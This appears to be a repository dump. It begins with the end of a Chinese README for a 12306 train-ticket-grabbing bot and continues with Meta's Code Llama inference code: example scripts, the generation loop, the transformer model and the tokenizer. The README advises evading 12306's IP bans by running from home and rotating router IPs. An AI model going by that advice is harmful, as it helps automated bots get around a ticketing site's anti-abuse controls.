请立即打开浏览器登录12306,访问‘未完成订单’,在30分钟内完成支付! 
``` #### 使用帮助(一些安装问题和使用反馈较多的问题): - 测试邮箱是否可用 [邮箱配置问题看issues](https://github.com/testerSunshine/12306/issues/107) - 学生票issues [学生票修改](https://github.com/testerSunshine/12306/issues/47) - 依赖安装不对的问题(ImportError)[requirements.txt问题](https://github.com/testerSunshine/12306/issues/91) - 若快豆子疑问 [点我](https://github.com/testerSunshine/12306/issues/67) - IOError: 【Errno 0】 Error 问题 [点我](https://github.com/testerSunshine/12306/issues/159) - 测试下单接口是否可用,有两个下单接口,随便用哪个都ok - 如果下载验证码过期或者下载失败的问题,应该是12306封ip的策略,多重试几次,12306现在封服务器(阿里云和腾讯云)ip比较严重,尽量不要放在服务器里面 - 目前12306对服务器ip比较敏感,大家还是在自己家里挂着吧 - 自动更换ip软件目前已支持TPLINK和小米路由器,只限家庭网络[点我跳转](https://github.com/testerSunshine/AutoRouterIP) #### 感谢一下小伙伴对本项目提供的帮助 - @[email protected] - @ 才 - @[MonsterTan](https://github.com/MonsterTan) - 以及所有为此项目提供pr的同学 #### 更新日志 - [更新日志](Update.md)
codellama
e81b597e44dbecc2a0dedb9949fdf84adfc22395
File: example_infilling.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. import fire from llama import Llama def main( ckpt_dir: str, tokenizer_path: str, temperature: float = 0.0, top_p: float = 0.9, max_seq_len: int = 192, max_gen_len: int = 128, max_batch_size: int = 4, ): generator = Llama.build( ckpt_dir=ckpt_dir, tokenizer_path=tokenizer_path, max_seq_len=max_seq_len, max_batch_size=max_batch_size, ) prompts = [ '''def remove_non_ascii(s: str) -> str: """ <FILL> return result ''', """# Installation instructions: ```bash <FILL> ``` This downloads the LLaMA inference code and installs the repository as a local pip package. """, """class InterfaceManagerFactory(AbstractManagerFactory): def __init__(<FILL> def main(): factory = InterfaceManagerFactory(start=datetime.now()) managers = [] for i in range(10): managers.append(factory.build(id=i)) """, """/-- A quasi-prefunctoid is 1-connected iff all its etalisations are 1-connected. -/ theorem connected_iff_etalisation [C D : precategoroid] (P : quasi_prefunctoid C D) : π₁ P = 0 ↔ <FILL> = 0 := begin split, { intros h f, rw pi_1_etalisation at h, simp [h], refl }, { intro h, have := @quasi_adjoint C D P, simp [←pi_1_etalisation, this, h], refl } end """, ] prefixes = [p.split("<FILL>")[0] for p in prompts] suffixes = [p.split("<FILL>")[1] for p in prompts] results = generator.text_infilling( prefixes=prefixes, suffixes=suffixes, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, ) for prompt, result in zip(prompts, results): print("\n================= Prompt text =================\n") print(prompt) print("\n================= Filled text =================\n") print(result["full_text"]) if __name__ == "__main__": fire.Fire(main) File: example_instructions.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from typing import Optional import fire from llama import Llama def main( ckpt_dir: str, tokenizer_path: str, temperature: float = 0.2, top_p: float = 0.95, max_seq_len: int = 512, max_batch_size: int = 8, max_gen_len: Optional[int] = None, ): generator = Llama.build( ckpt_dir=ckpt_dir, tokenizer_path=tokenizer_path, max_seq_len=max_seq_len, max_batch_size=max_batch_size, ) instructions = [ [ { "role": "user", "content": "In Bash, how do I list all text files in the current directory (excluding subdirectories) that have been modified in the last month?", } ], [ { "role": "user", "content": "What is the difference between inorder and preorder traversal? Give an example in Python.", } ], [ { "role": "system", "content": "Provide answers in JavaScript", }, { "role": "user", "content": "Write a function that computes the set of sums of all contiguous sublists of a given list.", } ], ] results = generator.chat_completion( instructions, # type: ignore max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, ) for instruction, result in zip(instructions, results): for msg in instruction: print(f"{msg['role'].capitalize()}: {msg['content']}\n") print( f"> {result['generation']['role'].capitalize()}: {result['generation']['content']}" ) print("\n==================================\n") if __name__ == "__main__": fire.Fire(main) File: example_completion.py # Copyright (c) Meta Platforms, Inc. and affiliates. 
# This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from typing import Optional import fire from llama import Llama def main( ckpt_dir: str, tokenizer_path: str, temperature: float = 0.2, top_p: float = 0.9, max_seq_len: int = 256, max_batch_size: int = 4, max_gen_len: Optional[int] = None, ): generator = Llama.build( ckpt_dir=ckpt_dir, tokenizer_path=tokenizer_path, max_seq_len=max_seq_len, max_batch_size=max_batch_size, ) prompts = [ # For these prompts, the expected answer is the natural continuation of the prompt """\ def fizzbuzz(n: int):""", """\ import argparse def main(string: str): print(string) print(string[::-1]) if __name__ == "__main__":""" ] results = generator.text_completion( prompts, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, ) for prompt, result in zip(prompts, results): print(prompt) print(f"> {result['generation']}") print("\n==================================\n") if __name__ == "__main__": fire.Fire(main) File: setup.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from setuptools import find_packages, setup def get_requirements(path: str): return [l.strip() for l in open(path)] setup( name="codellama", version="0.0.1", packages=find_packages(), install_requires=get_requirements("requirements.txt"), ) File: llama/generation.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. import json import os import sys import time from pathlib import Path from typing import List, Literal, Optional, Tuple, TypedDict import torch import torch.nn.functional as F from fairscale.nn.model_parallel.initialize import ( get_model_parallel_rank, initialize_model_parallel, model_parallel_is_initialized, ) from llama.model import ModelArgs, Transformer from llama.tokenizer import Tokenizer if torch.cuda.is_available(): device = "cuda" elif torch.backends.mps.is_available(): device = "mps" else: device = "cpu" Role = Literal["system", "user", "assistant"] class Message(TypedDict): role: Role content: str destination: str # required for model responses class InfillingPrediction(TypedDict, total=False): generation: str full_text: str tokens: List[str] # not required logprobs: List[float] # not required class CompletionPrediction(TypedDict, total=False): generation: str tokens: List[str] # not required logprobs: List[float] # not required class ChatPrediction(TypedDict, total=False): generation: Message tokens: List[str] # not required logprobs: List[float] # not required Dialog = List[Message] B_INST, E_INST = "[INST]", "[/INST]" B_SYS, E_SYS = "<<SYS>>\n", "\n<</SYS>>\n\n" SPECIAL_TAGS = [B_INST, E_INST, "<<SYS>>", "<</SYS>>", "<step>"] UNSAFE_ERROR = "Error: special tags are not allowed as part of the prompt." 
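# Note on the constants above: chat_completion() wraps every user turn as
# f"{B_INST} {content} {E_INST}" and folds an optional system message into the first
# user turn between B_SYS and E_SYS. Dialogs whose messages already contain any of
# SPECIAL_TAGS are flagged as unsafe, and their generated content is replaced with
# UNSAFE_ERROR, so user-supplied text cannot inject template markup into the prompt.
# The "<step>" tag is additionally used as the turn separator (and stop token) by the
# 70B instruct format assembled in dialog_prompt_tokens() further below.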
class Llama: @staticmethod def build( ckpt_dir: str, tokenizer_path: str, max_seq_len: int, max_batch_size: int, model_parallel_size: Optional[int] = None, ) -> "Llama": if not torch.distributed.is_initialized(): if device == "cuda": torch.distributed.init_process_group("nccl") else: torch.distributed.init_process_group("gloo") if not model_parallel_is_initialized(): if model_parallel_size is None: model_parallel_size = int(os.environ.get("WORLD_SIZE", 1)) initialize_model_parallel(model_parallel_size) local_rank = int(os.environ.get("LOCAL_RANK", 0)) if device == "cuda": torch.cuda.set_device(local_rank) # seed must be the same in all processes torch.manual_seed(1) if local_rank > 0: sys.stdout = open(os.devnull, "w") start_time = time.time() checkpoints = sorted(Path(ckpt_dir).glob("*.pth")) assert len(checkpoints) > 0, f"no checkpoint files found in {ckpt_dir}" assert model_parallel_size == len( checkpoints ), f"Loading a checkpoint for MP={len(checkpoints)} but world size is {model_parallel_size}" ckpt_path = checkpoints[get_model_parallel_rank()] checkpoint = torch.load(ckpt_path, map_location="cpu") with open(Path(ckpt_dir) / "params.json", "r") as f: params = json.loads(f.read()) model_args: ModelArgs = ModelArgs( max_seq_len=max_seq_len, max_batch_size=max_batch_size, **params, ) tokenizer = Tokenizer(model_path=tokenizer_path) model_args.vocab_size = tokenizer.n_words # support for mac if device == "cuda": if torch.cuda.is_bf16_supported(): torch.set_default_tensor_type(torch.cuda.BFloat16Tensor) else: torch.set_default_tensor_type(torch.cuda.HalfTensor) else: torch.set_default_tensor_type(torch.HalfTensor) model = Transformer(model_args) model.load_state_dict(checkpoint, strict=False) model.to(device) print(f"Loaded in {time.time() - start_time:.2f} seconds") return Llama(model, tokenizer) def __init__(self, model: Transformer, tokenizer: Tokenizer): self.model = model self.tokenizer = tokenizer @torch.inference_mode() def generate( self, prompt_tokens: List[List[int]], max_gen_len: int, temperature: float = 0.6, top_p: float = 0.9, logprobs: bool = False, echo: bool = False, stop_token: Optional[int] = None, ) -> Tuple[List[List[int]], Optional[List[List[float]]]]: if stop_token is None: stop_token = self.tokenizer.eos_id params = self.model.params bsz = len(prompt_tokens) assert bsz <= params.max_batch_size, (bsz, params.max_batch_size) min_prompt_len = min(len(t) for t in prompt_tokens) max_prompt_len = max(len(t) for t in prompt_tokens) assert max_prompt_len <= params.max_seq_len total_len = min(params.max_seq_len, max_gen_len + max_prompt_len) pad_id = self.tokenizer.pad_id tokens = torch.full((bsz, total_len), pad_id, dtype=torch.long, device=device) for k, t in enumerate(prompt_tokens): tokens[k, : len(t)] = torch.tensor(t, dtype=torch.long, device=device) if logprobs: token_logprobs = torch.zeros_like(tokens, dtype=torch.float, device=device) prev_pos = 0 stop_reached = torch.tensor([False] * bsz, device=device) input_text_mask = tokens != pad_id for cur_pos in range(min_prompt_len, total_len): logits = self.model.forward(tokens[:, prev_pos:cur_pos], prev_pos) if logprobs: token_logprobs[:, prev_pos + 1 : cur_pos + 1] = -F.cross_entropy( input=logits.transpose(1, 2), target=tokens[:, prev_pos + 1 : cur_pos + 1], reduction="none", ignore_index=pad_id, ) if temperature > 0: probs = torch.softmax(logits[:, -1] / temperature, dim=-1) next_token = sample_top_p(probs, top_p) else: next_token = torch.argmax(logits[:, -1], dim=-1) next_token = next_token.reshape(-1) # only 
replace token if prompt has already been generated next_token = torch.where( input_text_mask[:, cur_pos], tokens[:, cur_pos], next_token ) tokens[:, cur_pos] = next_token stop_reached |= (~input_text_mask[:, cur_pos]) & (next_token == stop_token) prev_pos = cur_pos if all(stop_reached): break if logprobs: token_logprobs = token_logprobs.tolist() out_tokens, out_logprobs = [], [] for i, toks in enumerate(tokens.tolist()): # cut to max gen len start = 0 if echo else len(prompt_tokens[i]) toks = toks[start : len(prompt_tokens[i]) + max_gen_len] probs = None if logprobs: probs = token_logprobs[i][start : len(prompt_tokens[i]) + max_gen_len] # cut to stop token if present if stop_token in toks: stop_idx = toks.index(stop_token) toks = toks[:stop_idx] probs = probs[:stop_idx] if logprobs else None out_tokens.append(toks) out_logprobs.append(probs) return (out_tokens, out_logprobs if logprobs else None) def text_completion( self, prompts: List[str], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, echo: bool = False, ) -> List[CompletionPrediction]: if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [self.tokenizer.encode(x, bos=True, eos=False) for x in prompts] generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, echo=echo, ) if logprobs: assert generation_logprobs is not None return [ { "generation": self.tokenizer.decode(t), "tokens": [self.tokenizer.token_piece(x) for x in t], "logprobs": logprobs_i, } for t, logprobs_i in zip(generation_tokens, generation_logprobs) ] return [{"generation": self.tokenizer.decode(t)} for t in generation_tokens] def text_infilling( self, prefixes: List[str], suffixes: List[str], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, suffix_first: bool = False, ) -> List[InfillingPrediction]: assert self.tokenizer.eot_id is not None if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [ infilling_prompt_tokens( self.tokenizer, prefix, suffix, suffix_first=suffix_first ) for prefix, suffix in zip(prefixes, suffixes) ] generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, echo=False, stop_token=self.tokenizer.eot_id, ) generations = [self.tokenizer.decode_infilling(t) for t in generation_tokens] if logprobs: assert generation_logprobs is not None return [ { "generation": generation, "logprobs": logprobs_i, "tokens": [self.tokenizer.token_piece(x) for x in t], "full_text": prefix + generation + suffix, } for prefix, suffix, generation, t, logprobs_i in zip( prefixes, suffixes, generations, generation_tokens, generation_logprobs, ) ] else: return [ { "generation": generation, "full_text": prefix + generation + suffix, } for prefix, suffix, generation in zip(prefixes, suffixes, generations) ] def chat_completion( self, dialogs: List[Dialog], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, ) -> List[ChatPrediction]: if self.tokenizer.step_id is not None: return self._chat_completion_turns( dialogs=dialogs, temperature=temperature, top_p=top_p, max_gen_len=max_gen_len, logprobs=logprobs, ) if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [] unsafe_requests = [] for dialog in 
dialogs: unsafe_requests.append( any([tag in msg["content"] for tag in SPECIAL_TAGS for msg in dialog]) ) if dialog[0]["role"] == "system": dialog = [ # type: ignore { "role": dialog[1]["role"], "content": B_SYS + dialog[0]["content"] + E_SYS + dialog[1]["content"], } ] + dialog[2:] assert all([msg["role"] == "user" for msg in dialog[::2]]) and all( [msg["role"] == "assistant" for msg in dialog[1::2]] ), ( "model only supports 'system', 'user' and 'assistant' roles, " "starting with 'system', then 'user' and alternating (u/a/u/a/u...)" ) dialog_tokens: List[int] = sum( [ self.tokenizer.encode( f"{B_INST} {prompt['content'].strip()} {E_INST} {answer['content'].strip()} ", bos=True, eos=True, ) for prompt, answer in zip( dialog[::2], dialog[1::2], ) ], [], ) assert ( dialog[-1]["role"] == "user" ), f"Last message must be from user, got {dialog[-1]['role']}" dialog_tokens += self.tokenizer.encode( f"{B_INST} {dialog[-1]['content'].strip()} {E_INST}", bos=True, eos=False, ) prompt_tokens.append(dialog_tokens) generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, ) if logprobs: assert generation_logprobs is not None return [ { "generation": { # type: ignore "role": "assistant", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, }, "tokens": [self.tokenizer.token_piece(x) for x in t], "logprobs": logprobs_i, } for t, logprobs_i, unsafe in zip( generation_tokens, generation_logprobs, unsafe_requests ) ] return [ { "generation": { # type: ignore "role": "assistant", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, } } for t, unsafe in zip(generation_tokens, unsafe_requests) ] def _chat_completion_turns( self, dialogs: List[Dialog], temperature: float = 0.6, top_p: float = 0.9, max_gen_len: Optional[int] = None, logprobs: bool = False, ) -> List[ChatPrediction]: if self.tokenizer.step_id is None: raise RuntimeError("Model not suitable for chat_completion_step()") if max_gen_len is None: max_gen_len = self.model.params.max_seq_len - 1 prompt_tokens = [] unsafe_requests = [] for dialog in dialogs: unsafe_requests.append( any([tag in msg["content"] for tag in SPECIAL_TAGS for msg in dialog]) ) # Insert system message if not provided if dialog[0]["role"] != "system": dialog = [{"role": "system", "content": ""}] + dialog # type: ignore dialog_tokens = dialog_prompt_tokens(self.tokenizer, dialog) prompt_tokens.append(dialog_tokens) generation_tokens, generation_logprobs = self.generate( prompt_tokens=prompt_tokens, max_gen_len=max_gen_len, temperature=temperature, top_p=top_p, logprobs=logprobs, stop_token=self.tokenizer.step_id, ) if logprobs: assert generation_logprobs is not None return [ { "generation": { "role": "assistant", "destination": "user", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, }, "tokens": [self.tokenizer.token_piece(x) for x in t], "logprobs": logprobs_i, } for t, logprobs_i, unsafe in zip( generation_tokens, generation_logprobs, unsafe_requests ) ] return [ { "generation": { "role": "assistant", "destination": "user", "content": self.tokenizer.decode(t) if not unsafe else UNSAFE_ERROR, } } for t, unsafe in zip(generation_tokens, unsafe_requests) ] def sample_top_p(probs, p): probs_sort, probs_idx = torch.sort(probs, dim=-1, descending=True) probs_sum = torch.cumsum(probs_sort, dim=-1) mask = probs_sum - probs_sort > p probs_sort[mask] = 0.0 probs_sort.div_(probs_sort.sum(dim=-1, keepdim=True)) next_token = 
torch.multinomial(probs_sort, num_samples=1) next_token = torch.gather(probs_idx, -1, next_token) return next_token def infilling_prompt_tokens( tokenizer: Tokenizer, pre: str, suf: str, suffix_first: bool = False, ) -> List[int]: """ Format and encode an infilling problem. If `suffix_first` is set, format in suffix-prefix-middle format. """ assert tokenizer.prefix_id is not None assert tokenizer.middle_id is not None assert tokenizer.suffix_id is not None if suffix_first: # format as "<PRE> <SUF>{suf} <MID> {pre}" return ( [tokenizer.bos_id, tokenizer.prefix_id, tokenizer.suffix_id] + tokenizer.encode_infilling(suf) + [tokenizer.middle_id] + tokenizer.encode(pre, bos=False, eos=False) ) else: # format as "<PRE> {pre} <SUF>{suf} <MID>" return ( [tokenizer.bos_id, tokenizer.prefix_id] + tokenizer.encode(pre, bos=False, eos=False) + [tokenizer.suffix_id] + tokenizer.encode_infilling(suf) + [tokenizer.middle_id] ) def dialog_prompt_tokens(tokenizer: Tokenizer, dialog: Dialog) -> List[int]: """ Prompt formatting for multi-turn dialogs. The dialog is expected to start with a system message and then alternate between user and assistant messages. """ assert tokenizer.step_id is not None assert all([msg["role"] == "user" for msg in dialog[1::2]]) and all( [msg["role"] == "assistant" for msg in dialog[2::2]] ), ( "model only supports 'system', 'user' and 'assistant' roles, " "starting with 'system', then 'user' and alternating (u/a/u/a/u...)" ) assert ( dialog[-1]["role"] == "user" ), f"Last message must be from user, got {dialog[-1]['role']}" # Format context dialog_tokens: List[int] = [tokenizer.bos_id] headers: List[str] = [] for message in dialog: headers.clear() headers.append(f"Source: {message['role'].strip()}") if message.get("destination") is not None: headers.append(f"Destination: {message['destination'].strip()}") header = " " + "\n".join(headers) dialog_tokens += tokenizer.encode(header, bos=False, eos=False) if message["content"]: body = "\n\n " + message["content"].strip() dialog_tokens += tokenizer.encode(body, bos=False, eos=False) dialog_tokens += [tokenizer.step_id] # Start of reply headers.clear() headers.append("Source: assistant") headers.append("Destination: user") header = " " + "\n".join(headers) dialog_tokens += tokenizer.encode(header, bos=False, eos=False) dialog_tokens += tokenizer.encode("\n\n ", bos=False, eos=False) return dialog_tokens File: llama/__init__.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. from .generation import Llama from .model import ModelArgs, Transformer from .tokenizer import Tokenizer File: llama/model.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. 
import math from dataclasses import dataclass from typing import Any, Optional, Tuple import fairscale.nn.model_parallel.initialize as fs_init import torch import torch.nn.functional as F from fairscale.nn.model_parallel.layers import ( ColumnParallelLinear, ParallelEmbedding, RowParallelLinear, ) from torch import nn if torch.cuda.is_available(): device = "cuda" elif torch.backends.mps.is_available(): device = "mps" else: device = "cpu" @dataclass class ModelArgs: dim: int = 4096 n_layers: int = 32 n_heads: int = 32 n_kv_heads: Optional[int] = None vocab_size: int = -1 # defined later by tokenizer multiple_of: int = 256 # make SwiGLU hidden layer size multiple of large power of 2 ffn_dim_multiplier: Optional[float] = None norm_eps: float = 1e-5 rope_theta: float = 10000 max_batch_size: int = 32 max_seq_len: int = 2048 class RMSNorm(torch.nn.Module): def __init__(self, dim: int, eps: float = 1e-6): super().__init__() self.eps = eps self.weight = nn.Parameter(torch.ones(dim)) def _norm(self, x): return x * torch.rsqrt(x.pow(2).mean(-1, keepdim=True) + self.eps) def forward(self, x): output = self._norm(x.float()).type_as(x) return output * self.weight def precompute_freqs_cis(dim: int, end: int, theta: float = 10000.0): freqs = 1.0 / (theta ** (torch.arange(0, dim, 2)[: (dim // 2)].float() / dim)) t = torch.arange(end, device=freqs.device, dtype=torch.float32) # type: ignore freqs = torch.outer(t, freqs) # type: ignore freqs_cis = torch.polar(torch.ones_like(freqs), freqs) # complex64 return freqs_cis def reshape_for_broadcast(freqs_cis: torch.Tensor, x: torch.Tensor): ndim = x.ndim assert 0 <= 1 < ndim assert freqs_cis.shape == (x.shape[1], x.shape[-1]) shape = [d if i == 1 or i == ndim - 1 else 1 for i, d in enumerate(x.shape)] return freqs_cis.view(*shape) def apply_rotary_emb( xq: torch.Tensor, xk: torch.Tensor, freqs_cis: torch.Tensor, ) -> Tuple[torch.Tensor, torch.Tensor]: if not torch.cuda.is_available(): xq = xq.to('cpu') xk = xk.to('cpu') xq_ = torch.view_as_complex(xq.float().reshape(*xq.shape[:-1], -1, 2)) xk_ = torch.view_as_complex(xk.float().reshape(*xk.shape[:-1], -1, 2)) freqs_cis = reshape_for_broadcast(freqs_cis, xq_) xq_out = torch.view_as_real(xq_ * freqs_cis).flatten(3) xk_out = torch.view_as_real(xk_ * freqs_cis).flatten(3) return xq_out.type_as(xq).to(device), xk_out.type_as(xk).to(device) def repeat_kv(x: torch.Tensor, n_rep: int) -> torch.Tensor: """torch.repeat_interleave(x, dim=2, repeats=n_rep)""" bs, slen, n_kv_heads, head_dim = x.shape if n_rep == 1: return x return ( x[:, :, :, None, :] .expand(bs, slen, n_kv_heads, n_rep, head_dim) .reshape(bs, slen, n_kv_heads * n_rep, head_dim) ) class Attention(nn.Module): def __init__(self, args: ModelArgs): super().__init__() self.n_kv_heads = args.n_heads if args.n_kv_heads is None else args.n_kv_heads model_parallel_size = fs_init.get_model_parallel_world_size() self.n_local_heads = args.n_heads // model_parallel_size self.n_local_kv_heads = self.n_kv_heads // model_parallel_size self.n_rep = self.n_local_heads // self.n_local_kv_heads self.head_dim = args.dim // args.n_heads self.wq = ColumnParallelLinear( args.dim, args.n_heads * self.head_dim, bias=False, gather_output=False, init_method=lambda x: x, ) self.wk = ColumnParallelLinear( args.dim, self.n_kv_heads * self.head_dim, bias=False, gather_output=False, init_method=lambda x: x, ) self.wv = ColumnParallelLinear( args.dim, self.n_kv_heads * self.head_dim, bias=False, gather_output=False, init_method=lambda x: x, ) self.wo = RowParallelLinear( args.n_heads * 
self.head_dim, args.dim, bias=False, input_is_parallel=True, init_method=lambda x: x, ) self.cache_k = torch.zeros( ( args.max_batch_size, args.max_seq_len, self.n_local_kv_heads, self.head_dim, ) ).to(device) self.cache_v = torch.zeros( ( args.max_batch_size, args.max_seq_len, self.n_local_kv_heads, self.head_dim, ) ).to(device) def forward( self, x: torch.Tensor, start_pos: int, freqs_cis: torch.Tensor, mask: Optional[torch.Tensor], ): bsz, seqlen, _ = x.shape xq, xk, xv = self.wq(x), self.wk(x), self.wv(x) xq = xq.view(bsz, seqlen, self.n_local_heads, self.head_dim) xk = xk.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim) xv = xv.view(bsz, seqlen, self.n_local_kv_heads, self.head_dim) xq, xk = apply_rotary_emb(xq, xk, freqs_cis=freqs_cis) self.cache_k = self.cache_k.to(xq) self.cache_v = self.cache_v.to(xq) self.cache_k[:bsz, start_pos : start_pos + seqlen] = xk self.cache_v[:bsz, start_pos : start_pos + seqlen] = xv keys = self.cache_k[:bsz, : start_pos + seqlen] values = self.cache_v[:bsz, : start_pos + seqlen] # repeat k/v heads if n_kv_heads < n_heads keys = repeat_kv(keys, self.n_rep) # (bs, seqlen, n_local_heads, head_dim) values = repeat_kv(values, self.n_rep) # (bs, seqlen, n_local_heads, head_dim) xq = xq.transpose(1, 2) # (bs, n_local_heads, seqlen, head_dim) keys = keys.transpose(1, 2) values = values.transpose(1, 2) scores = torch.matmul(xq, keys.transpose(2, 3)) / math.sqrt(self.head_dim) if mask is not None: scores = scores + mask # (bs, n_local_heads, seqlen, cache_len + seqlen) scores = F.softmax(scores.float(), dim=-1).type_as(xq) output = torch.matmul(scores, values) # (bs, n_local_heads, seqlen, head_dim) output = output.transpose(1, 2).contiguous().view(bsz, seqlen, -1) return self.wo(output) class FeedForward(nn.Module): def __init__( self, dim: int, hidden_dim: int, multiple_of: int, ffn_dim_multiplier: Optional[float], ): super().__init__() hidden_dim = int(2 * hidden_dim / 3) # custom dim factor multiplier if ffn_dim_multiplier is not None: hidden_dim = int(ffn_dim_multiplier * hidden_dim) hidden_dim = multiple_of * ((hidden_dim + multiple_of - 1) // multiple_of) self.w1 = ColumnParallelLinear( dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x ) self.w2 = RowParallelLinear( hidden_dim, dim, bias=False, input_is_parallel=True, init_method=lambda x: x ) self.w3 = ColumnParallelLinear( dim, hidden_dim, bias=False, gather_output=False, init_method=lambda x: x ) def forward(self, x): return self.w2(F.silu(self.w1(x)) * self.w3(x)) class TransformerBlock(nn.Module): def __init__(self, layer_id: int, args: ModelArgs): super().__init__() self.n_heads = args.n_heads self.dim = args.dim self.head_dim = args.dim // args.n_heads self.attention = Attention(args) self.feed_forward = FeedForward( dim=args.dim, hidden_dim=4 * args.dim, multiple_of=args.multiple_of, ffn_dim_multiplier=args.ffn_dim_multiplier, ) self.layer_id = layer_id self.attention_norm = RMSNorm(args.dim, eps=args.norm_eps) self.ffn_norm = RMSNorm(args.dim, eps=args.norm_eps) def forward( self, x: torch.Tensor, start_pos: int, freqs_cis: torch.Tensor, mask: Optional[torch.Tensor], ): h = x + self.attention.forward( self.attention_norm(x), start_pos, freqs_cis, mask ) out = h + self.feed_forward.forward(self.ffn_norm(h)) return out class Transformer(nn.Module): def __init__(self, params: ModelArgs): super().__init__() self.params = params self.vocab_size = params.vocab_size self.n_layers = params.n_layers self.tok_embeddings = ParallelEmbedding( params.vocab_size, params.dim, 
init_method=lambda x: x, ) self.layers = torch.nn.ModuleList() for layer_id in range(params.n_layers): self.layers.append(TransformerBlock(layer_id, params)) self.norm = RMSNorm(params.dim, eps=params.norm_eps) self.output = ColumnParallelLinear( params.dim, params.vocab_size, bias=False, init_method=lambda x: x ) self.freqs_cis = precompute_freqs_cis( self.params.dim // self.params.n_heads, self.params.max_seq_len * 2, params.rope_theta, ) @torch.inference_mode() def forward(self, tokens: torch.Tensor, start_pos: int): _bsz, seqlen = tokens.shape h = self.tok_embeddings(tokens) self.freqs_cis = self.freqs_cis.to("cuda" if device == "cuda" else "cpu") freqs_cis = self.freqs_cis[start_pos : start_pos + seqlen] mask = None if seqlen > 1: mask = torch.full( (1, 1, seqlen, seqlen), float("-inf"), device=torch.device('cpu') ) mask = mask.to(torch.float32).triu(diagonal=start_pos+1).type_as(h) for layer in self.layers: h = layer(h, start_pos, freqs_cis, (mask.to(device) if mask is not None else mask)) h = self.norm(h) output = self.output(h).float() return output File: llama/tokenizer.py # Copyright (c) Meta Platforms, Inc. and affiliates. # This software may be used and distributed according to the terms of the Llama 2 Community License Agreement. import os from logging import getLogger from typing import List, Optional from sentencepiece import SentencePieceProcessor logger = getLogger() class Tokenizer: def __init__(self, model_path: str): # reload tokenizer assert os.path.isfile(model_path), model_path self.sp_model = SentencePieceProcessor(model_file=model_path) logger.info(f"Reloaded SentencePiece model from {model_path}") # BOS / EOS token IDs self.n_words: int = self.sp_model.vocab_size() self.bos_id: int = self.sp_model.bos_id() self.eos_id: int = self.sp_model.eos_id() self.pad_id: int = self.sp_model.pad_id() # token IDs for special infilling tokens self.prefix_id: Optional[int] = self.sp_model.piece_to_id("▁<PRE>") or None self.middle_id: Optional[int] = self.sp_model.piece_to_id("▁<MID>") or None self.suffix_id: Optional[int] = self.sp_model.piece_to_id("▁<SUF>") or None self.eot_id: Optional[int] = self.sp_model.piece_to_id("▁<EOT>") or None # marker for turn-based step format self.step_id: Optional[int] = self.sp_model.piece_to_id("<step>") or None logger.info( f"#words: {self.n_words} - BOS ID: {self.bos_id} - EOS ID: {self.eos_id} " f"- PRE ID: {self.prefix_id} - MID ID: {self.middle_id} - SUF ID: {self.suffix_id} - EOT ID: {self.eot_id} - STEP ID: {self.step_id}" ) assert self.sp_model.vocab_size() == self.sp_model.get_piece_size() def encode(self, s: str, bos: bool, eos: bool) -> List[int]: assert type(s) is str t = self.sp_model.encode(s) if bos: t = [self.bos_id] + t if eos: t = t + [self.eos_id] return t def decode(self, t: List[int]) -> str: return self.sp_model.decode(list(filter(lambda tk: tk != -1, t))) def token_piece(self, t: int) -> str: return self.sp_model.id_to_piece(t) def encode_infilling(self, s: str) -> List[int]: """Encode a string without an implicit leading space.""" return self.sp_model.encode("☺" + s)[2:] def decode_infilling(self, t: List[int]) -> str: """Decode a string without an implicit leading space.""" return self.sp_model.decode([self.sp_model.piece_to_id("☺")] + t)[1:]
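A short illustration of the `encode_infilling` / `decode_infilling` trick above: SentencePiece prepends an implicit leading space (`▁`) to anything it encodes, which would corrupt the suffix half of an infilling prompt, so the tokenizer encodes a sentinel `"☺"` first and slices its tokens off again. This is only a sketch, and the tokenizer path is an assumption:

```
from llama.tokenizer import Tokenizer

tok = Tokenizer(model_path="CodeLlama-7b/tokenizer.model")  # path is an assumption

suffix = "return result"
with_space = tok.encode(suffix, bos=False, eos=False)  # first piece carries the implicit "▁"
no_space = tok.encode_infilling(suffix)                # "☺" + suffix encoded, first two tokens dropped

print([tok.token_piece(t) for t in with_space[:2]])  # e.g. ['▁return', '▁result']
print([tok.token_piece(t) for t in no_space[:2]])    # e.g. ['return', '▁result'], no leading space marker
print(tok.decode_infilling(no_space))                # "return result"
```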
